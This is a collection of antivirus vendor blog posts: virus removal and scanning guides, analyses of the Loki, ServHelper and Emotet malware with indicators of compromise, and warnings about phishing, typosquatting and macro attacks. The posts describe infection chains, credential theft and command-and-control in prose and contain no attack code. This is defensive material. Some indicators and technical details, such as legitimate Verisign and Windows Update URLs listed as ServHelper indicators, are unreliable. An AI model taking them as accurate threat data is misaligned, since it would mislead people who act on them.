How to Remove Computer Viruses

Computer virus removal - how to remove computer viruses

How to Remove Viruses from Your Computer

Almost everyone who owns a computer is likely to run into trouble with viruses sooner or later – in 2023 alone, there were more than 6 billion malware attacks worldwide. Viruses and other types of malware can wreak havoc on computers, causing anything from minor inconveniences to severe data breaches, and even disrupting global organizations and infrastructure. While modern operating systems have improved on their defenses as time has gone by, viruses are also continuing to evolve. In this guide, we’ll cover how to recognize virus red flags, how to remove viruses from your computer, and ways to keep your system safe from future infections.

Identifying the signs of a virus infection

Before we explain the virus removal steps, let’s look at the symptoms of a computer virus. Knowing the warning signs can help you to catch a virus early, preventing it from causing unchecked damage to your computer and data. Malware is designed to operate covertly, but here are the things that could signal their presence.

Unexplained system behavior

An unexpected deterioration in the performance of your computer should always be a red flag. If it’s slower than it should be, freezing frequently, or crashing for no identifiable reason, it might be the work of a virus. This happens because malware often consumes a lot of your computer’s processing power.

Viruses can also affect your system settings. If you notice changes to your desktop background, unfamiliar icons, or your web browsing suddenly displaying a different homepage or new toolbars, it could be a sign that malicious software has modified your settings without your permission or knowledge.

Unusual pop-ups

A classic sign of a computer virus is an unexpected influx of pop-ups. More than just an annoyance, these pop-ups will often pose as antivirus tools themselves in an attempt to get you to click on them. By doing this they can lure unsuspecting users into downloading more malware, or disclosing personal information. Always treat any unfamiliar pop-ups suspiciously, and avoid clicking on any links or following their instructions.

Step-by-step virus removal process

If the warning signs above sound suspiciously familiar to you and you suspect your computer has a virus, taking immediate action is crucial. The following steps will help you remove viruses and any other malware that may be hiding on your system.

Enter safe mode

The first step in the virus removal process is to put your computer into safe mode. Safe mode is a diagnostic mode that limits your computer to running only essential programs and services, making it harder for viruses to operate and limiting the damage they can cause. By reducing background processes, safe mode also makes it easier to identify and remove viruses. The way you enter safe mode will differ depending on your operating system:

  • Windows: Restart your computer and press either the F8 or F11 key as it boots up.
  • Mac: Restart your computer and hold down the Shift key as it turns back on.

Run a full antivirus scan

Once you’re in safe mode, carry out your chosen form of antivirus scanning. Running a full scan ensures that your antivirus software can comb through your entire system to locate any threats. If you don’t have an antivirus program installed, find one that’s reputable and install it right away. A full system scan may take some time, so be prepared to wait.

Delete temporary files

Many viruses hide in the temporary files created by browsers, operating systems, or third-party apps, so cleaning these out is an essential but often-overlooked part of the removal process. Wait until your scan has completed before doing this – deleting files while the scan is running might disrupt the process and prevent it from being effective.

Quarantine and remove any threats

Once the scan is complete, it will generate a report for you to read. Your antivirus software will categorize threats based on their severity and recommend a course of action for each one. For files that can’t be safely deleted, your antivirus program will usually provide an option to quarantine them. This isolates any infected files, keeping them on your computer but preventing them from causing any harm.

For most threats, the best course of action is to delete them. Follow your antivirus software’s recommendations to remove the harmful files. Once you’ve done this, it’s a good idea to restart your computer and run another scan to make sure the virus has been fully removed.

Protecting your computer from future viruses

Here are some further computer virus protection tips we would recommend you follow.

Keep your software updated

A simple way to give yourself the best chance of avoiding viruses is to keep all of your computer software updated. Operating systems, antivirus software, and any apps you use will all receive regular updates that include vital security patches and improvements designed to block the latest threats.

If you struggle with remembering to check for updates, it’s usually possible to enable automatic updates. This way, your software will stay current without requiring any extra effort on your part.

Avoid unverified downloads

The internet is full of enticing downloads, from exciting new software to interesting-looking files. Unfortunately there are often viruses nestled among these dazzling distractions. Avoid downloading software or files from sites you don’t trust, and never open attachments from unknown senders. Stick to official websites app stores for any software you need, and question any email attachments you receive unexpectedly, even those from trusted sources – they might have been compromised.

Run regular scans

Even if you do everything right, there’s nothing that can make you one hundred percent immune to every possible threat. That’s why running regular scans is so important to maintaining the health of your computer. These scans can be scheduled to run automatically and send you periodic reports, so they won’t interrupt your regular computer usage. This proactive approach will help you to nip any viruses in the bud, before they have a chance to cause damage.

Show viruses the door

With the antivirus software available today, running into trouble with computer viruses doesn’t need to be a death sentence for your computer, or mean irreparable damage to your data. Being able to recognize the warning signs and follow the above steps puts you in the best position possible to handle malware in its many shapes and forms.

Your antivirus software is your best line of defense against malware – so choose it wisely, keep it updated, and scan regularly. For software that secures your peace of mind as well as your system, think SUPERAntiSpyware.

How to Scan Your Computer for Viruses

How to scan your computer for computer viruses

How to Scan Your Computer for Viruses

It’s often said that a poor workman blames his tools – but, when it comes to computers, the tools with which we manage so many aspects of daily life, maintaining their health is of the utmost importance. Viruses and other types of malware are constantly seeking to sneak into our systems in the hopes of stealing sensitive information, slowing down performance, and sometimes even causing irreparable damage. This guide will walk you through recognizing the signs of a computer virus and how to run the scans that can confirm your suspicions.

Signs your computer may have a virus

One of the most challenging aspects of computer viruses  is the fact that they can so often go unnoticed. Working in the background, quietly wreaking havoc, viruses and malware can lurk on your device while you go about your day to day tasks. Things you might brush off as annoying but benign occurrences – crashes, lag, pop-ups – can actually be the symptoms of a computer virus. This is why it’s important to recognize the signs.

Slow performance and frequent crashes

One of the first signs of a potential infection is a sudden drop in your computer’s performance. Viruses use up valuable resources such as memory and processing power, sapping the energy usually devoted to other programs and processes. If your computer starts to feel sluggish, freezes unexpectedly, or crashes without warning, this could indicate that it has been infected with a virus. If any of these issues start to occur for no apparent reason, it’s worth further investigation.

Unexpected pop-ups and redirects

Pop-up ads are a familiar nuisance; but a sudden surge of them, especially if they appear when you’re not actively browsing the web, should be seen as a major red flag. Some types of malware specifically trigger pop-ups or redirect you to suspicious websites in order to trick you into downloading them. Any time your browser opens a new tab unexpectedly, or repeatedly directs you to new sites you didn’t intend to visit, it’s a good chance that some sort of virus might be at work.

How to scan for viruses

You’ve recognized the warning signs – now comes the time to either confirm your fears, or provide yourself with peace of mind. During a scan, your device will be checked thoroughly for any potential harmful software – system files, programs, downloads, and other such components will be searched for any signs of malicious activity. Here’s how it’s done.

Step 1 – Install a reputable antivirus software

If you don’t already have one, your first step is to find yourself a reliable antivirus program. Not all antivirus software is created equal, so look for one that’s highly rated by experts and offers regular updates to combat ever-evolving online threats. The best antivirus software typically provides a comprehensive defense, scanning for viruses, malware, spyware, and other forms of malicious software.

Step 2 – Run a full system scan

Once your chosen software is installed, you’ll want to run a full system virus scan. A full scan sweeps every corner of your computer, ensuring that no stone is left unturned in their search for any malicious software. Full scans can take a while, potentially even hours, depending on your computer’s size and power, but they’re worth the time investment, especially if you have never scanned your computer before. 

Step 3 – Check scan reports and take action

Most antivirus software will provide you with virus scan reports once the scan is complete. This report will list any detected threats and provide you with options for how to handle them. They might even provide a list of potential vulnerabilities, allowing you to stop viruses from gaining access to your system in the first place. If your scan does find any existing threats, you’ll usually be given options along the lines of quarantining, deleting, or ignoring them. Quarantining a virus isolates it, preventing it from causing further harm, and deleting it removes it from your computer. Always take actions on any flagged items, and don’t ignore alerts unless you’re absolutely sure the file is safe.

The different types of scan

Most software will provide you with a few different options for what kind of scan you want to run. Each scan has its strengths, and some are more applicable than others depending on the situation.

Quick scans vs full scans

The shorter alternative to a full system virus scan, a quick scan will check the most common areas where malware can be found, such as system memory, startup files and download folders. Quick scans are ideal for routine check-ups, but aren’t as thorough as full scans. 

Custom scans

If there’s a particular area of your computer that’s causing you concern, or if you want to isolate a scan to a specific folder or external drive, you can often customize your scans to accommodate this. Because the scan will only be aimed at a precise location, it will take less computing power and often be quicker than a full scan.

Best practices for regular virus scanning

Knowing how to scan your computer for viruses is one thing – doing it on a regular basis is a habit you have to develop. Here are some of the best practices for keeping your computer virus-free.

Schedule regular scans

Setting up scheduled virus scans is a great way to alleviate the pressure of having to remember to run regular manual scans. Scheduling ensures that scans happen automatically, and can be set to run at times when you won’t be using your computer, so you’re not sitting around waiting for a scan to finish when you could be doing other things. A popular option is to schedule a quick scan once a day, and a weekly full system virus scan.

Keep your antivirus software updated

Your antivirus software is only as effective as its latest update. New viruses are created on a daily basis, often built specifically to combat the latest antivirus defense, so it’s important that antivirus providers regularly update and patch their programs with the latest improvements. Regularly checking your software for the latest update is as important as running regular scans. 

Plan your scans with SUPERAntiSpyware

To summarize:

  • There are lots of places for viruses to hide within the confines of your computer, and learning to recognize the warning signs can give you a valuable heads up.
  • Using antivirus software to run scans will enable you to detect any viruses or malware lurking undetected in your device.
  • Utilize both full system virus scans and quick scans.
  • Running scheduled virus scans can help to ensure round the clock protection, even for the forgetful among us.
  • Software updates keep you safe from the latest threats.

Protecting your computer doesn’t need to be difficult or confusing – with the right tools, it’s actually pretty straightforward. Get in touch with us today to find out more about our anti spyware products.

How to remove Loki

Delivered through malicious spam campaigns, Loki focuses on stealing credentials off the victim computer and runs a keylogger, a common hacking method. Loki also communicates back to a Command and Control server (C&C) to report what it finds and to receive commands if needed.

How it works

Loki, named after the creator’s username Lokistov, is delivered to users through a variety of channels, but the most common is malicious emails that can come in a variety of types. The most common strategy is the familiar “invoice” style email that attempts to get the potential victim to open the attachment. Once opened, the “invoice” will try to run embedded macros or get the user to follow a link to a downloader. One example of such a “invoice” can be found below.

Invoice enable content picture

If the potential victim were to click “Enable Content,” Loki would be installed and start gathering data. This is a common attack vector[  and was used by, albeit in a more complex way, Emotet.

This is not the only way Loki can be delivered, however, as it can be purchased by a malicious user,  Loki will be delivered in the most cost effective way.

Loki focuses primarily on credential-stealing and boasts an impressive 80 programs it has the ability to steal from. The most notable being all major browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Microsoft Edge
  • Microsoft Internet Explorer
  • Opera Software’s Opera browser

In addition to this already worrying list, Loki is able to go after many alternative versions of these browsers such as:

  • 8pecxstudio’s variant of Firefox, Cyberfox
  • Google’s open-source browser Chromium
  • Independently developed Firefox fork, WaterFox
  • Nichrome

In addition to browsers, Loki can go after FTP clients, Microsoft Outlook, and independently developed SuperPuTTY. This list will likely be expanded in future campaigns to include more commonly used programs if vulnerabilities are found.

After connecting and confirming the presence of its C&C server, Loki launches a keylogger in a separate thread. This keylogger records every button press of the keyboard during its operation and can be used to reveal other passwords and usernames that may not have been stored in a program it can access. This is then bundled with any other data it retrieved.

Once the data is gathered, it is compressed and sent to the C&C server hosted by the malicious actor. These normally are shut down quickly after a new campaign has been identified but can remain active for days or weeks at a time giving them plenty of time to store the gathered data somewhere else and sell it.

Who is affected?

Loki can be bought in the dark web for fairly cheap. Last know price at the time of this writing was $70. The consequence of this is that Loki can be used to target anyone. The benefit of the availability is it makes it much easier for Anti-Malware companies to stop it.

Indicators of Compromise

  1. C:\Users\admin\AppData\Local\Temp\saver.scr
  2. a.doko.moe
  3. MD5: 500F84B83BE685009C136A67690CA0C3

What you can do


If you or someone you know is infected with the Loki malware download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Loki from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech03 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How To Remove Loki

  1. Restart the infected computer in safe mode without networking.
  2. Search through the items in the Indicators of Infection section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove ServHelper

ServHelper is a new backdoor with a downloader variant, which first appeared in November of 2018. Named by the Threat actor “Ta505,” ServHelper spreads through email campaigns using a quantity-over-quality approach that has proven to work, albeit less effectively than the Emotet strategies discussed here. ServHelper seems to be largely targeted toward businesses but could change to focus on individual’s in future campaigns.

How does ServHelper works

ServHelper is downloaded through Microsoft Word documents with macros. The documents often pretend to be invoices, though they may take other forms such as, but not limited to: greeting cards, complaints, or details from your bank. These documents attempt to convince the victim to enable macros in them by saying that the content cannot be viewed until macros are enabled. If the victim clicks the Enable Content button, the infected document runs code that downloads ServHelper to the computer. You can learn more about how to protect yourself here. An example is shown below:

 Infected enable Content doc

Another method employed by ServHelper is to distribute PDF files that claim you must follow the link provided to update your PDF viewer. These links instead reach out to a download server that infects anyone who visits. The end result is the same regardless of whether the victim gets the infection from a Word document or a PDF.

Once installed, ServHelper does one of two things.

  1. Establishes a remote-control session that allows the malicious actor to control the infected computer from anywhere. To accomplish this, the malware talks to a Command and Control server (C&C) where it takes it commands from. Some of the notable commands include: the ability to kill itself and remove traces of itself from the computer, the ability to copy user’s browser profiles, and the ability to execute a command shell. This allows the attackers to gain access to your PII as well as any passwords, usernames, bank account information, using advanced hacking methods.
  2. Drops another piece of malware known as FlawedGrace. ServHelper recently removed some of its capabilities (in this version only) to instead focusing on dropping this malware. FlawedGrace acts as a remote-access Trojan providing similar functions to ServHelper.

Who is affected?

ServHelper largely targets businesses, so most of the emails are designed to look like emails you would see in your day-to-day business, such as invoices. Despite this active focus, it’s entirely possible for computers outside of a business to be infected and extorted, so protection is paramount.

Indicators of Compromise

ServHelper makes several changes that indicate whether a computer has been infected.

  1. The most noticeable one is the C:\Windows\ServHelper.dll that is dropped in the windows folder.
  2. Unusual scheduled startup tasks are always noteworthy and ServHelper uses them to start itself every time a victim’s computer is ran.
  3. C:\PROGRAM FILES\COMMON FILES\SYSTEM\WINRESET.EXE
  4. crl.verisign[.]com/pca3[.]crl
  5. hxxp://ocsp.verisign[.]com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
  6. hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl[.]cab
  7. IP: 104.81.60.211
  8. IP: 104.81.60.51
  9. IP: 2.17.157.9

What you can do

If you or someone you know is infected with the ServHelper malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove ServHelper from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech02 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How to Remove ServHelper

  1. Restart the infected computer in safe mode without networking.
  2. Search through the Indicators of infection listed above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove Emotet

You may have heard of the Trojan Emotet before. Since first appearing back in 2014 stealing banking information, it has evolved into a multi-faceted threat that targets everyone. It uses social engineering through emails to attempt to convince the user to open a Microsoft Word document and run its malicious macros. Even more worrisome is that once Emotet has infected a target, it attempts to take over the victim’s Microsoft Outlook desktop application. If successful, Emotet goes through all sent emails and contacts and send out a new wave of spam emails. Only this time, the potential victims are receiving the message from a trusted email.

A campaign from Emotet over the Christmas season read like a friend sending a friendly season greeting.

Dear <name>,

You make the stars shine brighter and the winter days warmer just by being in my life. Merry Christmas to my favorite person in the world.

Merry Christmas and a wonderful New Year!

Greeting Card is attached

A lovely thing about Christmas is that it’s compulsory, like a thunderstorm, and we all go through it together. Garrison Keillor

While not limited to invoices or Christmas cards, these emails attempt to get the user to click the download link and then to open the document. In the email mentioned above the target may be fooled into thinking that the attached greeting card is legitimate.  The document actually contains a malicious macro, an embedded script. While macros were initially designed to help automate keystrokes and mouse movements, they were quickly abused by nefarious virus creators. The infection cannot run on its own as Microsoft has automatically disabled macros more than a decade ago to help stop these malicious scripts. Instead, Emotet uses a few techniques to get the user to re-enable macros. Examples can be seen below.



The picture urges the user to click the Enable Content button, implying that they cannot view the Word document until they do so. You may have already noticed that the bar itself says that macros have been disabled, and the Enable Content button will, in fact, allow them. The moment that Enable Content button is clicked, the macros will start, and in seconds you will be infected. Even worse, in most cases you will have no indication from this point forward that anything is wrong. In one test case we briefly had a command window appear:



This window lasted less than two seconds before disappearing. This attack vector is not unique to Emotet though. In fact, it has been used by a number of ransomware attacks in the past. If you ever see a document you didn’t expect to receive, you should always be extremely cautious with it and you should never enable macros without a very good reason.

How it works

Emotet is an evolving malware that has been known to primarily spread itself through email spam campaigns.  Emotet itself does not attempt to do much harm; instead, it opens the door for other malware who pay the doorman on the way in. It achieves this by using what is known as a Command and Control server (C&C): Emotet requests instructions from its C&C server, which  issues a new command. This command could be anything from “grab this malware sample and run it” to “tell me what passwords are stored in the user’s browser.” Emotet can receive updates and new capabilities in this way as well, showing that if Emotet has infected your computer or network, it should be removed as quickly as possible.

Emotet doesn’t stop at the first computer infected though. Once it’s on a network, it will attempt to get to all computers it’s connected to through a brute-force attack. Unless strong passwords are enforced on machines and all known vulnerabilities are patched, a single installation of Emotet can cause every computer in the network to become infected. Emotet is often updated with new exploits as they are found, meaning that while it may not be successful at first, it will keep trying until it finds something that does work.

Code

We won’t go into too much depth on the actual code itself, but a brief step-by-step walkthrough can be useful to get a better understanding on how this malware works.

1. In the Word document there is a VBA script that is obfuscated so that you cannot read it at a glance. All this code does is launch a command shell, which then launches PowerShell, a more powerful version of the Windows command shell.

2. Using PowerShell, the script attempts to download the core Emotet payload from a large variety of distribution websites.

3. The randomly named payload will then reach out to the main server and request a command. The command will change based on the campaign that is running —it could go grab new malware or it could attempt to use your own email address as a way to spread itself.

Who is affected

Many people assume that they will not be targets of malware campaigns. Emotet, though, targets everyone equally: it has the simple goal of getting on every machine it can and then getting paid to let other, more targeted malware come in behind it. If your email address has ever been sold, disclosed in a breach, or was on a friend’s email list when they got infected, then it’s possible you will receive a malicious email from them.

Indicators of infection

The main location for the executable is in C:\Users\<name>\AppData\Local\ and then whatever new name Emotet decides to use. One we have seen often is archivessymbol, but this will change. If you see something in this folder you don’t know about, it’s important to run a scan.

Versions of Emotet can also drop files onto your computer in C:\Users\Public or C:\Users\<username>:

These files generally have 5-6 randomly generated numbers in the file name, followed by .exe. These are not actually executable files, but HTML documents that are used to generate revenue for the Blackhat’s by simulating clicks on web advertisements.

What you can do


If you or someone you know is infected with the Emotet malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Emotet from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech01 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

Emotet has also been known to exploit a vulnerability in Windows called EternalBlue. Microsoft has issued a patch for this, and applying this patch can help protect you from Emotet as well as other malware who utilize this exploit.

HOW TO REMOVE EMOTET

  1. Restart the infected computer in safe mode without networking
  2. Search through the Indicators of infection and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

Watch out for fake USPS delivery emails!

usps

Fake USPS Delivery Emails?

We at SUPERAntiSpyware have been alerted to scam emails hitting users claiming to be from the US Postal Service (USPS) that contains a link that will infect them with malware. One of the emails being used by this scam is notice@ussp(DOT)com

The subject line of the email will typically be titled “Delivery notification – Parcel delivery *NUMBER* failed” containing a message that the user please call the number on the shipping notice we left at your doorstep (which there will be none!) to arrange a new delivery, and a link which you can view the delivery notice online, on the USPS website.

This is a fake link to a malware infested website.

If you see a link in a suspicious email such as this do not click the links or open the attachments no matter how innocent they sound. If it claims to be from an official organization, call them and ask if the email is legit. Better safe than sorry!

Tax Season is here – Watch out for Identity Stealing Spyware!

Taxes The Season is Here !

Keep your personal information safe this tax season by doing a Free scan with SUPERAntiSpyware Free Edition

We want to remind everyone that tax season is the time of increased attacks in the forms of spyware, various methods of phishing , and scams. Spyware and Malware authors significantly increase their activity during the tax season in order to try to steal data and withdraw money from bank accounts, steal credit cards, passwords, and other malicious acts.

Watch out for Identity Stealing Spyware!

During this tax season its important to do a few things to help protect yourself online:

1) Make sure your Operating System and software applications such as web browsers and email clients are up to date.

2) Run a Complete Scan with SUPERAntiSpyware regularly with the latest updates, at least twice a week during this period of increased activity.

3) Be cautious before visiting strange websites, or opening strange email attachments. Think before you click!

4) Manually erase, or use privacy software, to delete sensitive data from you PC. Spyware cannot steal what isn’t there!

5) Lookout for spam phishing email impersonating government, bank, or tax company officials asking for sensitive information.

Do you have any security recommendations that help you stay safe during the tax season? Feel free to leave a comment below!

SUPERAntiSpyware Team

Facebook Malware Attack

Facebook Malware Attack Warning

We’re receiving reports that Facebook is being used as a new vector for executing malware attacks, specifically as a means to distribute the Locky ransomware. While the ransomware variant is not being hosted directly on Facebook, this new version is being hosted in a peculiar way.

The attack starts by a presumably infected machine sending out a message to people in your friends list. This message is actually a SVG (Scalable Vector Graphics) file that is being masqueraded as an image for you to download to view. Once the file has been downloaded and opened, the payload is delivered. Because of the way SVG files work, JavaScript can be embedded into those files and opened with a modern web browser. That JavaScript will then execute and direct the user to a website that mimics YouTube, but with a completely different URL.

Once on that site, a popup is pushed to the user asking them to download a certain extension on your machine in order to view the video. After the extension has been installed, the attackers have the ability to view and alter data regarding the websites you visit, as well as access your Facebook account in order to message all of your friends with the same SVG file.

The payload is delivered through the Nemucod downloader Trojan, which has been known to download copies of Locky on victim’s PCs.

While Google and Facebook have been made aware of this attack, it is possible that proper remediation could take time. The best course of action if you receive such a message is to ignore it, clear your conversation history with that person, and report them to Facebook as having a compromised account.

If you have already been infected by this attack, there’s not much you can do outside of removing the offending extension in Chrome by going to Menu > More Tools > Extensions and check to see if either Ubo or One extensions are listed. This is also a good time to remove any unknown extensions that are installed as well.

Remember, once you have been locked out of your system by a piece of ransomware, your options for recovery are only as good as the backups you have made. Keep your backups up-to-date, and save your data on an outside drive as frequently as possible. Once a ransomware infection has taken place, any attached drives to your network are at risk. Never keep your backup drives attached to your machine when they are not in use.

Typosquatting: Another front of malware attacks

Typosquatting is a type of internet scam that relies on end users making mistakes, such as spelling errors or entering the wrong domain name when entering a websites URL. It is also commonly known as URL Hijacking. There are many motivations for a hijacker to take the Typosquatting approach to deceiving unsuspecting victims:

1) To redirect web traffic to their own or a competitor’s product.

2) Installing malware to infect the user’s machine, typically with ad-hosting pieces of malware.

3) Freeze the web browser for a fake Tech Support scam, scaring the user into calling a fake tech support number claiming the user has a virus infection. These scams potentially cost the users hundreds of dollars.

4) To steal user information by running a phishing scheme to mimic legitimate website.

5) Making revenue from the user clicking on advertisements (either in plain site or disguised as legitimate search links) on the Typosquat website.

6) To blackmail or strong-arm payment from the company they’re Typosquatting in order to force a purchase of the website from the Typosquatter.

A scammer who runs a Typosquat scam typically registers a website address with spelling close to the legitimate websites address. This is typically something simple like omitting a letter, adding a letter, or using a different Top Level Domain. For example if a user wants to go to our website, they may end up typing superaantispyware[dot]com with double a’s. This will end up showing a user a Typosquatting website such as this:

Another type of Typosquat scam would be due to the person improperly typing out the full URL, typing something like google [dot] om , rather than typing google [dot] com. In this instance, the person typing the .om domain would actually be viewing a page hosted on Oman’s Top Level Domain, rather than the basic .com domain. In some instances, large corporations will buy up as many associated domains as they can in order to prevent this type of mistake (Google, for example, has variants of their site containing multiple o’s and different Top Level Domains); however, not all companies have the foresight and/or money to do this.

It is easy to avoid falling prey to a Typosquatting scam. Here are a few easy things you can do to prevent this.

1) Never open links in emails from unexpected senders, and exercise caution when visiting sites you’re not familiar with.

2) Bookmark your favorite websites so you can easily access them.

3) Use a search engine like Google, Bing, or Yahoo when looking for a specific website if you are unsure about the spelling or if the business’ website is the same as their name. Some car dealerships, for example, use dealer names or slogans as their website.

4) Double check the URL you are typing before loading the page

5) Make sure Real-Time Protection is turned on in SUPERAntiSpyware Professional

6) If you are starting a web-based business, consider buying multiple domains that are similar to your primary site to preemptively stop Typosquatters. Most domain registrars will offer bulk rates when you purchase more than one domain at a time.

While this type of attack is somewhat uncommon by today’s standards, it still happens every once in a while. By practicing safe browsing habits, keeping your web browsers up-to-date, and running regular scans of your machine, you should not be impacted by most of these types of attacks.

Macros and You: An old attack becomes chic again

Macros and You ?

Some of the earliest computer viruses and malware were created using macros in Microsoft Office documents. These pieces of malicious code would run once the document was opened, and the infection would happen without the user even being aware that their machine had been compromised. While these types of attacks had fallen out of favor over the years, they’ve come back in style and are more popular than ever before.

What exactly is a macro?

While you’ve probably heard the term thrown around before, most people don’t actually know what they are, or what they’re capable of. In short, macros are little snippets of code that run through your office software. Many people use macros to speed up a repetitive processes, like formatting items. Unfortunately, the same type of code that is used to perform the mundane can also be used to perform the malicious.

Due to the ease of abuse, Microsoft removed the automatic enabling of macros many years ago. This is ultimately what lead to the majority of these types of attacks going by the wayside. Because there was no longer a way to abuse this on most machines, would-be attackers changed their methods to more traditional programs, which are far easier to detect with a normal malware scanner.

With the recent surge in ransomware, new methods of delivery were needed by would-be attackers. The anti-malware engines had been able to detect many variants, and it was only getting easier. This meant that stealth was needed. What better way to do that than to bring back a tried-and-true method in Office Macros. Few people expected it due to the fact that these infection types hadn’t really been seen in years.

The basic attack is carried out like this:

1) An infected person sends you an email with the subject similar to “ATTN: Invoice Attached” that has a Word document attached.

2) The person downloads and opens the file, only to see a garbled mess of characters with a notice that says “Enable macro if the data encoding is incorrect” in big bold red letters at the top of the window

3) The unknowing victim enables macros, thereby initiating the malicious code

4) The code runs, sending out an email to your Outlook contacts (attempting to infect them), downloads whatever payload(s) it wants, then runs the ransomware (locking your files)

Because of the sharp increase in these types of attacks, Microsoft, SUPERAntiSpyware, and many other security vendors recommend that all users disable macros if they do not need to use them. While Macros should be disabled by default, it is worth double-checking your preferences in order to ensure that you are protected as best as possible.

For more information on how to disable macros in Office files, please visit this Microsoft Support article.

NOTE: This is a recommendation specifically for home users, if you are in a work environment please contact your IT department first before making any changes!